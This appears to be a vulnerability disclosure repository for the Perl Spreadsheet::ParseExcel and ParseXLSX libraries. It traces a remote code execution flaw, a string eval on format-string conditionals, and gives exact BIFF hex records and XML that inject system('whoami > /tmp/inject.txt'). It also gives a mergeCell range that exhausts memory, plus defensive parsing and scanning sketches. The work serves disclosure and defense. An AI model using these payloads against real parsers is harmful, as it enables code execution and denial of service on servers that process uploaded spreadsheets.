├── ParseXLSX_0days.pptx
├── README.md
├── parse_xlsx_bomb.md
└── poc
    ├── .gitignore
    ├── README.md
    ├── bomb
        ├── Dockerfile
        ├── ahihi.pl
        └── ahihi.xlsx
    ├── rce
        ├── Dockerfile
        ├── run.sh
        ├── test-xls.pl
        ├── test.pl
        ├── test.xls
        └── test.xlsx
    └── xls-payload.py


/ParseXLSX_0days.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/ParseXLSX_0days.pptx


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # ParseExcel security vulnerability
  2 | 
  3 | > TL;DR: RCE from logic in parsing format strings.
  4 | 
  5 | ## Short explanation on the exploit
  6 | 
  7 | The root cause is a call to `eval` on unvalidated user input in `Utility.pm`:
  8 | 
  9 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/Utility.pm#L171
 10 | ```perl
 11 | # Utility.pm
 12 | sub ExcelFmt {
 13 | 	my ( $format_str, $number, $is_1904, $number_type, $want_subformats ) = @_;
 14 | 
 15 | 	return $number unless $number =~ $qrNUMBER;
 16 | 	
 17 | 	my $conditional;
 18 | 	if ( $format_str =~ /^\[([<>=][^\]]+)\](.*)$/ ) {
 19 | 		$conditional = $1;
 20 | 		$format_str  = $2;
 21 | 	}
 22 | 
 23 | 	#...
 24 | 
 25 | 	if ($conditional) {
 26 | 		# TODO. Replace string eval with a function.
 27 | 		$section = eval "$number $conditional" ? 0 : 1;
 28 | 	}
 29 |     #...
 30 | }
 31 | ```
 32 | 
 33 | From what I inspected, the current implementation of this flow lacks proper validation, and using `eval` to handle comparison logic is overkill here. As a result, both `ParseExcel::parse` and `ParseXLSX::parse` (used for reading data from Excel files) are vulnerable to RCE.
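To illustrate why `eval` is not needed here, the comparison can be done with a strict parse of the conditional. The following is a minimal Python sketch of that idea, not the upstream fix: the function name `select_section` and the accepted operator set are assumptions made for illustration, and anything that is not "operator followed by a plain number" is rejected rather than executed.

```python
import operator
import re

# Comparison operators accepted in a conditional section (assumed set).
_OPS = {
    "<": operator.lt,
    "<=": operator.le,
    ">": operator.gt,
    ">=": operator.ge,
    "=": operator.eq,
    "<>": operator.ne,
}

# An operator followed by a plain decimal number, and nothing else.
_COND_RE = re.compile(r"(<=|>=|<>|<|>|=)\s*([+-]?\d+(?:\.\d+)?)")


def select_section(number, conditional):
    """Return 0 if `number` satisfies `conditional`, else 1 (hypothetical helper)."""
    match = _COND_RE.fullmatch(conditional)
    if match is None:
        raise ValueError(f"unsupported conditional: {conditional!r}")
    op, operand = match.groups()
    return 0 if _OPS[op](number, float(operand)) else 1
```

With this approach a conditional such as `>123` selects a section as before, while a conditional carrying extra text after the number raises an error instead of reaching an interpreter.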
 34 | 
 35 | ### Where's `$format_str`?
 36 | `ValFmt` is the most likely caller of `ExcelFmt`, so I'll look at this method first.
 37 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L141-L161
 38 | ```perl
 39 | sub ValFmt {
 40 |     my ( $oThis, $oCell, $oBook ) = @_;
 41 | 
 42 |     my ( $Dt, $iFmtIdx, $iNumeric, $Flg1904 );
 43 | 
 44 |     if ( $oCell->{Type} eq 'Text' ) {
 45 |         $Dt =
 46 |           ( ( defined $oCell->{Val} ) && ( $oCell->{Val} ne '' ) )
 47 |           ? $oThis->TextFmt( $oCell->{Val}, $oCell->{Code} ) # Perform some encoding logic => doesn't cause RCE
 48 |           : '';
 49 | 
 50 |         return $Dt;
 51 |     }
 52 |     else {
 53 |         $Dt      = $oCell->{Val};
 54 |         $Flg1904 = $oBook->{Flg1904};
 55 |         my $sFmtStr = $oThis->FmtString( $oCell, $oBook );
 56 | 
 57 |         # where RCE lies => $oCell->{Type} must be either "Date" or "Numeric"
 58 |         return ExcelFmt( $sFmtStr, $Dt, $Flg1904, $oCell->{Type} ); 
 59 |     }
 60 | }
 61 | ```
 62 | If `$oCell->{Type}` is `Date` or `Numeric`, `ExcelFmt` will be called.
 63 | 
 64 | The value of `$format_str` is returned from another method, `FmtString`:
 65 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L101-L136
 66 | ```perl
 67 | sub FmtString {
 68 |     my ( $oThis, $oCell, $oBook ) = @_;
 69 | 
 70 |     my $sFmtStr =
 71 |       $oThis->FmtStringDef( $oBook->{Format}[ $oCell->{FormatNo} ]->{FmtIdx},
 72 |         $oBook ); # maps to the correct format string
 73 |         
 74 |     #...
 75 | 
 76 |     unless ( defined($sFmtStr) ) {
 77 |         # assigns default format string depending on the value, can ignore
 78 |         #...
 79 |     }
 80 |     return $sFmtStr;
 81 | }
 82 | ```
 83 | Another function is being called, so we'll examine `FmtStringDef` as well
 84 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L87-L96
 85 | ```perl
 86 | sub FmtStringDef {
 87 |     my ( $oThis, $iFmtIdx, $oBook, $rhFmt ) = @_;
 88 |     my $sFmtStr = $oBook->{FormatStr}->{$iFmtIdx}; # does the mapping
 89 | 
 90 |     # More with assigning default format string, can ignore
 91 |     #...
 92 | }
 93 | ```
 94 | 
 95 | With all the variables traced, the attack vector is as follows:
 96 | - Inject the malicious format string with index `$iFmtIdx`
 97 | - Make sure a cell format `$oBook->{Format}[$cellFmtIdx]` maps to `$iFmtIdx`
 98 | - Make sure a cell maps to that cell format (`$oCell->{FormatNo} = $cellFmtIdx`)
 99 | ![[flow 1.png]] 
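The lookup chain traced above can be modeled with plain dictionaries. This is a simplified Python sketch of the data flow only; the dictionary keys mirror the Perl hash keys from the excerpts, while `resolve_format_string` and the benign sample values are made up for illustration.

```python
# Simplified model of the workbook structures seen in the Perl excerpts.
book = {
    # format string index -> format string (filled from the file)
    "FormatStr": {0xA5: "0.00"},
    # list of cell formats; each one points at a format string index
    "Format": [{"FmtIdx": 0xA5}],
}

# A cell points at a cell format through its position in book["Format"].
cell = {"FormatNo": 0, "Type": "Numeric", "Val": 42}


def resolve_format_string(cell, book):
    """Follow cell -> cell format -> format string (hypothetical helper)."""
    cell_format = book["Format"][cell["FormatNo"]]
    return book["FormatStr"].get(cell_format["FmtIdx"])


print(resolve_format_string(cell, book))
```

All three values (the format string, the `FmtIdx` of the cell format, and the `FormatNo` of the cell) come from the parsed file, which is why the format string that reaches `ExcelFmt` is fully attacker-controlled.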
100 | 
101 | In the sections below, I'll explain in detail how the payload propagates the shell code to the `eval` call. There are two sections: parsing a .xls file with `ParseExcel` and parsing a .xlsx file with `ParseXLSX`.
102 | 
103 | ## PoC
104 | To demonstrate, below is a link to our crafted malicious Excel files (.xls and .xlsx) that run `whoami` and store the result in `/tmp/inject.txt`.
105 | https://gist.github.com/haile01/0f4f19e4441895ef33ff27385080478b
106 | 
107 | ### Exploitation on XLS file
108 | Take a simple Perl program that parses an xls file, like the one below, using `ParseExcel::parse`. RCE happens while parsing is performed, even before any data is fetched.
109 | 
110 | ```perl
111 | use strict;
112 | use Spreadsheet::ParseExcel;
113 | 
114 | my $parser = Spreadsheet::ParseExcel->new();
115 | # test.xls is a malicious file supplied by an end user
116 | my $workbook = $parser->parse("test.xls");
117 | ```
118 | 
119 | #### Injecting format string
120 | Excel 97 binary files are structured into chunks of binary data called BIFF records. Each record starts with a 2-byte `opCode` (little-endian), followed by the 2-byte length of the record and then its actual data.
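The record framing described above can be sketched in a few lines of Python. This is not a port of `QueryNext` (it ignores encryption and the 20,000-byte sanity check); `iter_biff_records` is a hypothetical helper, and the sample stream is built by hand from an RK opcode (`0x027E`) and an EOF opcode (`0x000A`).

```python
import struct


def iter_biff_records(stream):
    """Yield (opcode, data) for each BIFF record in a byte stream (sketch)."""
    pos = 0
    while pos + 4 <= len(stream):
        # Two little-endian 16-bit words: opcode, then payload length.
        opcode, length = struct.unpack_from("<HH", stream, pos)
        data = stream[pos + 4 : pos + 4 + length]
        if len(data) < length:
            break  # truncated record, stop instead of guessing
        yield opcode, data
        pos += 4 + length


# Hand-built sample: one 10-byte record followed by an empty record.
sample = struct.pack("<HH", 0x027E, 10) + bytes(10) + struct.pack("<HH", 0x000A, 0)
records = list(iter_biff_records(sample))
```

Each yielded pair corresponds to what the parser hands to the per-opcode handler table.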
121 | 
122 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L438
123 | ```perl
124 | sub QueryNext {
125 |     my ( $q ) = @_;
126 | 
127 | 
128 |     if ( $q->{streamPos} + 4 >= $q->{streamLen} ) {
129 |         return 0;
130 |     }
131 | 
132 |     my $data = substr( $q->{stream}, $q->{streamPos}, 4 );
133 | 
134 |     ( $q->{opcode}, $q->{length} ) = unpack( 'v2', $data );
135 | 
136 |     # No biff record should be larger than around 20,000.
137 |     if ( $q->{length} >= 20000 ) {
138 |         return 0;
139 |     }
140 | 
141 |     if ( $q->{length} > 0 ) {
142 |         $q->{data} = substr( $q->{stream}, $q->{streamPos} + 4, $q->{length} );
143 |     }
144 |     else {
145 |         $q->{data}                     = undef;
146 |         $q->{dont_decrypt_next_record} = 1;
147 |     }
148 | 
149 |     if ( $q->{encryption} == MS_BIFF_CRYPTO_RC4 ) {
150 |         # Handles with decryption
151 |     }
152 |     elsif ( $q->{encryption} == MS_BIFF_CRYPTO_XOR ) {
153 |         # not implemented
154 |         return 0;
155 |     }
156 |     elsif ( $q->{encryption} == MS_BIFF_CRYPTO_NONE ) {
157 | 
158 |     }
159 | 
160 |     $q->{streamPos} += 4 + $q->{length};
161 | 
162 |     return 1;
163 | }
164 | ```
165 | 
166 | After that, the handler registered for the record type is used to process that BIFF record's data.
167 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L576-L580
168 | 
169 | ```perl
170 | if ( defined $self->{FuncTbl}->{$record} && !$workbook->{_skip_chart} )
171 | {
172 | 		$self->{FuncTbl}->{$record}
173 | 			->( $workbook, $record, $record_length, $record_header );
174 | }
175 | ```
176 | 
177 | Format strings are handled by `_subFormat`, with `opCode = 0x41E`:
178 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1563-L1585
179 | ```perl
180 | sub _subFormat {
181 | 
182 |     my ( $oBook, $bOp, $bLen, $sWk ) = @_;
183 |     my $sFmt;
184 | 
185 |     if ( $oBook->{BIFFVersion} <= verBIFF5 ) {
186 |         $sFmt = substr( $sWk, 3, unpack( 'c', substr( $sWk, 2, 1 ) ) );
187 |         $sFmt = $oBook->{FmtClass}->TextFmt( $sFmt, '_native_' );
188 |     }
189 |     else {
190 |         $sFmt = _convBIFF8String( $oBook, substr( $sWk, 2 ) );
191 |     }
192 | 
193 |     my $format_index = unpack( 'v', substr( $sWk, 0, 2 ) );
194 | 
195 |     # Excel 4 and earlier used an index of 0 to indicate that a built-in format
196 |     # that was stored implicitly.
197 |     if ( $oBook->{BIFFVersion} <= verBIFF4 && $format_index == 0 ) {
198 |         $format_index = keys %{ $oBook->{FormatStr} };
199 |     }
200 | 
201 |     $oBook->{FormatStr}->{$format_index} = $sFmt;
202 | }
203 | ```
204 | 
205 | I wasn't sure which BIFF version is used in my .xls file, but according to the data in the binary file, it should match the `else` case (> `verBIFF5`).
206 | 
207 | The structure of a format string record in newer BIFF versions, as seen in the PoC bytes below, is
208 | **1E 04 \[record length - 2 bytes\] \[format string index - 2 bytes\] \[format string length - 2 bytes\] \[string flags - 1 byte\] \[format string content\]**
209 | 
210 | By following the correct structure, I can inject any format string into the .xls file.
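As a sanity check on the record layout, here is a small Python sketch that builds and parses a format string record with a harmless format (`0.00`). It assumes the BIFF8 layout that the hex dump below is consistent with: a 2-byte index, a 2-byte character count (`2c 00` in the dump), a 1-byte flags field (`00`), then the characters. `parse_format_record` is a hypothetical helper and only handles the 8-bit string case.

```python
import struct

FORMAT_OPCODE = 0x041E


def parse_format_record(record):
    """Return (format_index, format_string) from one raw FORMAT record (sketch)."""
    opcode, length = struct.unpack_from("<HH", record, 0)
    if opcode != FORMAT_OPCODE or len(record) < 4 + length:
        raise ValueError("not a complete FORMAT record")
    # index (2 bytes), character count (2 bytes), string flags (1 byte)
    index, char_count, flags = struct.unpack_from("<HHB", record, 4)
    if flags & 0x01:
        raise ValueError("16-bit strings are not handled in this sketch")
    text = record[9 : 9 + char_count].decode("latin-1")
    return index, text


# Build a benign record the same way: header, index, length, flags, string.
fmt = "0.00"
body = struct.pack("<HHB", 0x00A5, len(fmt), 0) + fmt.encode("latin-1")
record = struct.pack("<HH", FORMAT_OPCODE, len(body)) + body
print(parse_format_record(record))
```

The same arithmetic explains the PoC header: a 44-character string gives a record length of 2 + 2 + 1 + 44 = 49 = `0x31`.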
211 | 
212 | The actual BIFF record for the format string I injected in the PoC (the format string index is `0x00A5`, stored little-endian as `a5 00`)
213 | ```
214 | 00000000: 1e04 3100 a500 2c00 005b 3e31 3233 3b73  ..1...,..[>123;s
215 |                     ^^^^
216 | 		        format string index
217 | 00000010: 7973 7465 6d28 2777 686f 616d 6920 3e20  ystem('whoami >
218 | 00000020: 2f74 6d70 2f69 6e6a 6563 742e 7478 7427  /tmp/inject.txt'
219 | 00000030: 295d 3132 33                             )]123
220 | ```
221 | 
222 | #### Mapping a cell format to the format string
223 | Cell formats define many properties of a cell, such as format string, styling, fonts, ... A cell format links to a format string by including the format string's index inside its BIFF record. This logic is handled by `_subXF`:
224 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1441-L1558
225 | 
226 | ```perl
227 | sub _subXF {
228 |     my ( $oBook, $bOp, $bLen, $sWk ) = @_;
229 |     
230 |     #...
231 | 
232 |     if ( $oBook->{BIFFVersion} == verBIFF4 ) {
233 |         #...
234 |     }
235 |     elsif ( $oBook->{BIFFVersion} == verBIFF8 ) {
236 |         my ( $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn );
237 | 
238 |         ( $iFnt, $iIdx, $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn )
239 |           = unpack( "v7Vv", $sWk );
240 |         #...
241 |     }
242 |     else {
243 |         ( $iFnt, $iIdx, $iGen, $iAlign, $iPtn, $iPtn2, $iBdr1, $iBdr2 ) =
244 |           unpack( "v8", $sWk );
245 |         #...
246 |     }
247 | 
248 |     push @{ $oBook->{Format} }, Spreadsheet::ParseExcel::Format->new(
249 |         FontNo => $iFnt,
250 |         Font   => $oBook->{Font}[$iFnt],
251 |         FmtIdx => $iIdx, # <- the index that points to format string index
252 |         #...
253 |     );
254 | }
255 | ```
256 | Because our `BIFFVersion` is greater than BIFF5, the condition shouldn't fall into the first case. For the other two, `$iIdx` is the second word of the BIFF data, so this step is trivial as well.
257 | 
258 | The actual BIFF record for cell format I used in the PoC
259 | ```
260 | 00000000: e000 1400 0000 a500 f5ff 2000 0000 0000  .......... .....
261 |                          ^^^^
262 |                   format string index
263 | 00000010: 0000 0000 0000 c020                      .......
264 | ```
265 | Moreover, cell formats are identified by their index in a list. I modified the first record, so my cell format index is `0`.
266 | 
267 | #### Mapping a cell to the cell format
268 | For a cell to apply a format, it should include the index of the cell format inside the cell's BIFF record. However, as mentioned before, only a cell of type `Numeric` or `Date` can trigger the RCE, so I'll use a number cell for the PoC (stored as an RK BIFF record).
269 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L918-L939
270 | 
271 | ```perl
272 | sub _subRK {
273 |     my ( $workbook, $biff_number, $length, $data ) = @_;
274 |     my ( $row, $col, $format_index, $rk_number ) = unpack( 'vvvV', $data );
275 |     my $number = _decode_rk_number( $rk_number );
276 | 
277 |     _NewCell(
278 |         $workbook, $row, $col,
279 |         Kind     => 'RK',
280 |         Val      => $number,
281 |         FormatNo => $format_index,
282 |         Format   => $workbook->{Format}->[$format_index],
283 |         Numeric  => 1,
284 |         Code     => undef,
285 |         Book     => $workbook,
286 |     );
287 |     #... 
288 | }
289 | ```
290 | We can see that the index that maps to a cell format is the third word of the record, so all we need to do is set this word to `\x00\x00`.
291 | 
292 | The actual BIFF record for the RK cell I used in the PoC
293 | ```
294 | 00000000: 7e02 0a00 0000 0000 0000 201a e240       ~......... ..@
295 |                               ^^^^
296 | 	                        format index
297 | ```
298 | 
299 | Note that `_subRK` does not set the cell type explicitly. Type checking is implemented in `ChkType` instead:
300 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L166-L181
301 | 
302 | ```perl
303 | sub ChkType {
304 |     my ( $oPkg, $iNumeric, $iFmtIdx ) = @_;
305 |     if ($iNumeric) {
306 |         if (   ( ( $iFmtIdx >= 0x0E ) && ( $iFmtIdx <= 0x16 ) )
307 |             || ( ( $iFmtIdx >= 0x2D ) && ( $iFmtIdx <= 0x2F ) ) )
308 |         {
309 |             return "Date";
310 |         }
311 |         else {
312 |             return "Numeric";
313 |         }
314 |     }
315 |     else {
316 |         return "Text";
317 |     }
318 | }
319 | ```
320 | Since `$iNumeric` is set to `1`, we are sure that type is not `Text`
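For readers who prefer to check the branches by hand, the following is a direct Python transcription of the `ChkType` logic shown above (the name `chk_type` is just the Python spelling used here). It shows which type a numeric cell gets for a given format string index.

```python
def chk_type(is_numeric, fmt_idx):
    """Python transcription of the ChkType branches shown above."""
    if is_numeric:
        # Built-in date/time format indexes.
        if 0x0E <= fmt_idx <= 0x16 or 0x2D <= fmt_idx <= 0x2F:
            return "Date"
        return "Numeric"
    return "Text"


# A numeric cell whose cell format points at index 0xA5:
print(chk_type(1, 0xA5))
```

Both non-`Text` results take the `else` branch of `ValFmt`, so either one leads to `ExcelFmt`.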
321 | 
322 | Finally, when a new `Cell` object is initialized, `ValFmt` is called and continues the execution chain, propagating our shell command to `eval`.
323 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel.pm#L2375-L2433
324 | 
325 | ### Exploitation on XLSX file
326 | Working with a .xlsx file is easier, since we can directly modify the data in plaintext (XML format).
327 | Take a simple Perl program that parses an xlsx file, like the one below, using `ParseXLSX::parse`. RCE happens while parsing is performed, even before any data is fetched.
328 | 
329 | ```perl
330 | use strict;
331 | use Spreadsheet::ParseExcel;
332 | use Spreadsheet::ParseXLSX;
333 | 
334 | my $parser = Spreadsheet::ParseXLSX->new();
335 | # test.xlsx is a malicious file supplied by an end user
336 | my $workbook = $parser->parse("test.xlsx");
337 | ```
338 | An XLSX file is a zip archive containing many XML files, each holding a specific type of workbook data.
339 | Below is an example of the folder structure:
340 | ```
341 | |- [Content_Types].xml 
342 | |- _rels
343 | |- docProps
344 | 	|- app.xml
345 | 	|- core.xml
346 | |- xl
347 | 	|- _rels   
348 | 		|- workbook.xml.rels          
349 | 	|- styles.xml              <--- Format strings & cell formats       
350 | 	|- workbook.xml
351 | 	|- sharedStrings.xml 
352 | 	|- theme             
353 | 		|- theme1.xml
354 | 	|- worksheets
355 | 		|- sheet1.xml            <--- Cell values
356 | ```
357 | 
358 | #### Injecting format string & mapping to a cell format
359 | Format strings are stored in `xl/styles.xml` under the `<numFmts>` tag, while cell formats are defined under the `<cellXfs>` tag.
360 | https://github.com/doy/spreadsheet-parsexlsx/blob/80198923186bedda61d4dceb0272210dc8bec533/lib/Spreadsheet/ParseXLSX.pm#L630-L923
361 | 
362 | ```perl
363 | sub _parse_styles {
364 |     # ...
365 |     my %format_str = (
366 |         %default_format_str,
367 |         (map {
368 |             $_->att('numFmtId') => $_->att('formatCode')
369 |         } $styles->find_nodes('//s:numFmts/s:numFmt')),
370 |     );
371 |     # ...
372 |     my @format = map {
373 |         my %opts = (
374 |             %default_format_opts,
375 |             %ignore,
376 |         );
377 |         # ...
378 |         $opts{FmtIdx}   = 0+($xml_fmt->att('numFmtId')||0);
379 |         # ...
380 |         Spreadsheet::ParseExcel::Format->new(%opts)
381 |     } $styles->find_nodes('//s:cellXfs/s:xf');
382 |     # ...
383 |     
384 |     
385 |     return {
386 |         FormatStr => \%format_str,
387 |         Font      => \@font,
388 |         Format    => \@format,
389 |     }
390 | }
391 | ```
392 | 
393 | To inject a format string, we need to add a `<numFmt>` tag, with `formatCode` being the format string, and `numFmtId` being any integer value we want. Here I used `123`.
394 | 
395 | After that, we add one more `<xf>` element that maps to the format string by setting its `numFmtId` attribute to our chosen id (`123`).
396 | 
397 | The final xml data I used in the PoC
398 | ```xml
399 | <!-- xl/styles.xml -->
400 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
401 | <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
402 | ...
403 |   <numFmts count="1">
404 |     <!-- injected format string -->
405 |     <numFmt numFmtId="123" formatCode="[>123;system('whoami > /tmp/inject.txt')]123"/>
406 |   </numFmts> 
407 | ...
408 |   <cellXfs count="4">
409 |     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
410 |     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
411 |       <alignment horizontal="center"/>
412 |     </xf>
413 |     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
414 |     <!-- injected cell format -->
415 |     <xf numFmtId="123" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
416 |   </cellXfs>
417 | ...
418 | </styleSheet>
419 | ```
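From the defensive side, the same structure makes it possible to screen `xl/styles.xml` before handing a file to the parser. The sketch below is an illustration only: `suspicious_num_formats` is a hypothetical helper, the prefix regex mirrors the one in `ExcelFmt`, and the "safe" pattern (an operator followed by a plain number) is an assumption about what a legitimate conditional looks like. The sample document uses a harmless placeholder rather than a real payload.

```python
import re
import xml.etree.ElementTree as ET

NS = {"s": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# Same leading-conditional shape that ExcelFmt extracts from a format string.
COND_PREFIX = re.compile(r"^\[([<>=][^\]]+)\]")
# Assumed shape of a legitimate conditional: operator plus a plain number.
SAFE_COND = re.compile(r"(<=|>=|<>|<|>|=)\s*[+-]?\d+(?:\.\d+)?")


def suspicious_num_formats(styles_xml):
    """Return (numFmtId, formatCode) pairs whose conditional is not a plain comparison."""
    # Note: a real scanner should use a hardened XML parser for untrusted input.
    root = ET.fromstring(styles_xml)
    flagged = []
    for num_fmt in root.findall("s:numFmts/s:numFmt", NS):
        code = num_fmt.get("formatCode", "")
        match = COND_PREFIX.match(code)
        if match and not SAFE_COND.fullmatch(match.group(1)):
            flagged.append((num_fmt.get("numFmtId"), code))
    return flagged


SAMPLE = """<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="2">
    <numFmt numFmtId="164" formatCode="[&gt;100]0.0"/>
    <numFmt numFmtId="165" formatCode="[&gt;1;not_a_number]0"/>
  </numFmts>
</styleSheet>"""

print(suspicious_num_formats(SAMPLE))
```

A check like this is a stopgap; removing the string `eval` from the formatting code is the actual fix.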
420 | 
421 | #### Mapping a cell to the cell format
422 | https://github.com/doy/spreadsheet-parsexlsx/blob/80198923186bedda61d4dceb0272210dc8bec533/lib/Spreadsheet/ParseXLSX.pm#L205-L487
423 | ```perl
424 | sub _parse_sheet {
425 |     my $sheet_xml = $self->_new_twig(
426 |         twig_roots => {
427 |             #...
428 |             's:sheetData/s:row' => sub {
429 |                 my ( $twig, $row_elt ) = @_;
430 |                 for my $cell ( $row_elt->children('s:c') ){
431 |                     my $type = $cell->att('t') || 'n';
432 |                     my $val = $val_xml ? $val_xml->text : undef;
433 | 
434 |                     #...
435 |                     elsif ($type eq 'n') {
436 |                         $long_type = 'Numeric';
437 |                         $val = defined($val) ? 0+$val : undef;
438 |                     }
439 |                     elsif ($type eq 'd') {
440 |                         $long_type = 'Date';
441 |                     }
442 |                     # other $type results into $long_type = 'Text'
443 |                     #...
444 |                     
445 |                     my $format_idx = $cell->att('s') || 0;
446 |                     my $format = $sheet->{_Book}{Format}[$format_idx];
447 |                     die "unknown format $format_idx" unless $format;
448 |                     
449 |                     my $cell = Spreadsheet::ParseExcel::Cell->new(
450 |                         Val      => $val,
451 |                         Type     => $long_type,
452 |                         Merged   => undef, # fix up later
453 |                         Format   => $format,
454 |                         FormatNo => $format_idx,
455 |                         ($formula
456 |                             ? (Formula => $formula->text)
457 |                             : ()),
458 |                         Rich     => $Rich,
459 |                     );
460 |                     $cell->{_Value} = $sheet->{_Book}{FmtClass}->ValFmt(
461 |                         $cell, $sheet->{_Book}
462 |                     );
463 |                 }
464 |             }
465 |         }
466 |     )
467 | }
468 | ```
469 | The logic for reading cell data in this library is more straightforward: it assigns the type and value directly from the XML tag attributes. Since we need `$oCell->{Type}` to be `Date` or `Numeric`, we just need attribute `t` to be `d` or `n`. To map the cell to the cell format, we also set attribute `s` to the index of the cell format (`3`).
470 | 
471 | The final xml data I used in the PoC
472 | ```xml
473 | <!-- xl/worksheets/sheet1.xml -->
474 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
475 | <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{39528CB2-0246-0542-84DC-33008C4AE4F2}">
476 |   ...
477 |   <sheetData>
478 |     <row r="1" spans="1:2" x14ac:dyDescent="0.2">
479 |       <c r="A1" s="3" t="n"> <!-- 3 is the order of our cell format -->
480 |         <v>0</v>
481 |       </c>
482 |       <c r="B1" s="2"/>
483 |     </row>
484 |   </sheetData>
485 |   ...
486 | </worksheet>
487 | ```
488 | 


--------------------------------------------------------------------------------
/parse_xlsx_bomb.md:
--------------------------------------------------------------------------------
 1 | # ParseXLSX security vulnerabilities
 2 | 
 3 | > TL;DR: memory utilization go brrrr
 4 | 
 5 | ## DoS via out-of-memory bugs
 6 | 
 7 | ### Analysis
 8 | 
 9 | ParseXLSX also handles merged cells, but its approach of pre-marking every cell in a merged range lets an attacker force an arbitrarily large memory allocation.
10 | 
11 | ```perl
12 | # ParseXLSX.pm
13 | sub _parse_sheet {
14 |     my $sheet_xml = $self->_new_twig(
15 |         twig_roots => {
16 |             #...
17 |             's:mergeCells/s:mergeCell' => sub {
18 |                 my ( $twig, $merge_area ) = @_;
19 | 
20 |                 if (my $ref = $merge_area->att('ref')) {
21 |                     my ($topleft, $bottomright) = $ref =~ /([^:]+):([^:]+)/;
22 | 
23 |                     # Parse cell coordinates to numeric
24 |                     my ($toprow, $leftcol)     = $self->_cell_to_row_col($topleft);
25 |                     my ($bottomrow, $rightcol) = $self->_cell_to_row_col($bottomright);
26 | 
27 |                     push @{ $sheet->{MergedArea} }, [
28 |                         $toprow, $leftcol,
29 |                         $bottomrow, $rightcol,
30 |                     ];
31 |                     
32 |                     # Saves merged state for each cell in the merged cell
33 |                     for my $row ($toprow .. $bottomrow) {
34 |                         for my $col ($leftcol .. $rightcol) {
35 |                             $merged_cells{"$row;$col"} = 1;
36 |                         }
37 |                     }
38 |                 }
39 | 
40 |                 $twig->purge;
41 |             },
42 |         }
43 |     )
44 | }
45 | 
46 | sub _cell_to_row_col {
47 |     my $self = shift;
48 |     my ($cell) = @_;
49 | 
50 |     my ($col, $row) = $cell =~ /([A-Z]+)([0-9]+)/;
51 | 
52 |     my $ncol = 0;
53 |     for my $char (split //, $col) {
54 |         $ncol *= 26;
55 |         $ncol += ord($char) - ord('A') + 1;
56 |     }
57 |     $ncol = $ncol - 1;
58 | 
59 |     my $nrow = $row - 1;
60 | 
61 |     return ($nrow, $ncol);
62 | }
63 | ```
64 | 
65 | Because the size of a merged cell has no constraints, the program can be made to allocate a huge amount of memory, exhaust swap and crash the server.
66 | 
67 | ### Final POC
68 | In `xl/worksheets/sheet1.xml`, add
69 | ```xml
70 |   <mergeCells count="1">
71 |     <mergeCell ref="A1:ZZZZ9999"/>
72 |   </mergeCells>
73 | ```
74 | inside `<worksheet>` tag, or modify `ref` attribute of any existing `<mergeCell>` tag.
75 | 
76 | This makes the program create at least $26^4 \cdot 10^4 \approx 4.6 \cdot 10^9$ hash entries (so at least that many bytes) just for handling merged cells.
